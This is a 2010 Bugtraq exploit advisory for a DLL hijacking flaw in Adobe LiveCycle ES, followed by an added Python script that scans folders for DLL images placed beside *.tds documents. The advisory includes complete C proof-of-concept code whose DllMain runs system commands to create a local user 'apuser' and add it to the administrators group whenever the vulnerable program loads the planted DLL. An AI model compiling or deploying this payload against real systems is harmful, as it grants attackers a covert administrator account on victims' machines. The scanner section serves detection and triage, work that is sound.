Adobe LiveCycle ES DLL Hijacking Exploit (.dll)

Board: Bugtraq | Posted: 2010/09/14 02:01
##########################www.BugReport.ir########################################
#
#      AmnPardaz Security Research Team
#
# Title:		Adobe LiveCycle ES DLL Hijacking Exploit (.dll)
# Vendor:		http://www.adobe.com/products/livecycle/
# Vulnerable Version:	8.2.1.3144.1.471865
# Exploitation:		Remote Code Execution
###################################################################################

####################
- Description:
####################

Adobe® LiveCycle® Enterprise Suite (ES) software can help you extend
the value of existing back-end systems by enabling developers to build
and deploy applications quickly and easily, and by empowering business
users to manage application environments based on their specific needs.

With Adobe LiveCycle ES, you can make it easier for people to interact
with information through intuitive user experiences, improve
efficiencies through business process automation, and enhance customer
service through personalized communications management.

####################
- Vulnerability:
####################

+--> DLL Hijacking
	Compile the exploit and rename to .dll, create a file in the same dir
	with *.tds extension.
	(Vulnerability is discovered by DLLHijackAuditKit v2)

####################
- Exploits/PoCs:
####################

//tested on Windows XP SP3
#include "stdafx.h"
#include "windows.h"
#include <cstdlib>

int main()
{
	system("net user apuser appass /add");
	system("net localgroup administrators apuser /add");
	exit(0);
	return 0;
}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
					 )
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		main();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

####################
- Solution:
####################

http://blogs.technet.com/b/srd/archive/2010/08/23/more-information-about-dll-preloading-remote-attack-vector.aspx

####################
- Original Advisory:
####################

http://www.bugreport.ir/index_74.htm

####################
- Credit:
####################

AmnPardaz Security Research & Penetration Testing Group
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
Article ID (AID): #1CZcRZbQ (Bugtraq)
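
A defender-side check for the file layout the advisory describes (a DLL sitting in the same directory as a *.tds file), as an added example that is not part of the original advisory. Because the advisory does not name the DLL, this sketch flags any file whose PE header marks it as a DLL, whatever its extension; the function names and the sample tree are hypothetical and constructed.

```python
import os
import struct
import tempfile

IMAGE_FILE_DLL = 0x2000  # COFF Characteristics bit set on DLL images

def is_pe_dll(path):
    """True if the file is a PE image whose COFF header marks it as a DLL."""
    with open(path, "rb") as f:
        head = f.read(4096)
    if len(head) < 0x40 or head[:2] != b"MZ":
        return False
    (pe_off,) = struct.unpack_from("<I", head, 0x3C)  # e_lfanew
    if pe_off + 24 > len(head) or head[pe_off:pe_off + 4] != b"PE\0\0":
        return False
    (flags,) = struct.unpack_from("<H", head, pe_off + 22)
    return bool(flags & IMAGE_FILE_DLL)

def find_planted_dlls(root, doc_exts=(".tds",)):
    """List (dir, documents, dlls) for each directory holding both kinds of file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        docs = sorted(f for f in files if f.lower().endswith(doc_exts))
        if not docs:
            continue
        dlls = sorted(f for f in files if is_pe_dll(os.path.join(dirpath, f)))
        if dlls:
            findings.append((os.path.relpath(dirpath, root), docs, dlls))
    return findings

def _fake_pe(flags):
    """Constructed sample: DOS header, PE signature and COFF header only."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    return dos + b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 0, flags)

def demo():
    """Build a constructed tree and scan it; all file names are made up."""
    sample = {"share/report.tds": b"", "share/example.dll": _fake_pe(0x2102),
              "share/tool.exe": _fake_pe(0x0102), "clean/notes.tds": b"",
              "libs/other.dll": _fake_pe(0x2102)}
    with tempfile.TemporaryDirectory() as root:
        for rel, data in sample.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
        return find_planted_dlls(root)

if __name__ == "__main__":
    for directory, docs, dlls in demo():
        print(f"{directory}: {dlls} beside {docs}")
```

A hit is a triage lead, not proof of planting: document folders on file shares and removable media rarely have a legitimate reason to contain DLL images, while application install directories often do.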